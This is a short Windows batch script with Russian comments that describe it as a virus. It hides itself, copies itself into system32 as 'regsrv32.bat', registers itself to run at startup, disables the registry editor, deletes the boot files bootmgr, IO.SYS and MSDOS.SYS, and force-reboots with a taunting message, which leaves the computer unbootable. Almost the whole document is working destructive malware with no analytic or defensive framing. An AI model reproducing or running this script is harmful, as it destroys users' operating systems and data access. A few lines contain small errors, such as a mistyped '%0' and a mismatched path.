@echo off // прячем вывод результатов исполнения комманд
title regserv // меняем заголовок окна терминала
attrib 0% +h +s +a +r // выставляем права на файл вируса
copy ""%0"" "%SystemRoot%\system32\regsrv32.bat" >nul // копируем вирус в папку %SystemRoot%\system32\regsrv32.bat (%SystemRoot% - это папка windows)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "regsrv32" /t REG_SZ /d "%SystemRoot%\system\regsrv32.bat" /f >nul // пишем себя в автозагрузку
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
attrib C:\bootmgr -h -s -a -r /Если это ХР то ntldr // снимаем права с файла отвечающего за загрузку ОС
del c:\bootmgr >nul // удаляем его
attrib c:\IO.SYS -h -s -a -r // тут и далее коцаем системные файлы
del c:\IO.SYS >nul
attrib C:\MSDOS.SYS -h -s -a -r
del C:\MSDOS.SYS
shutdown -r -t 1 -c "Good bay, LAMER" -f >nul // перезагружаем компьютер выдавая сообщение на 1 секунду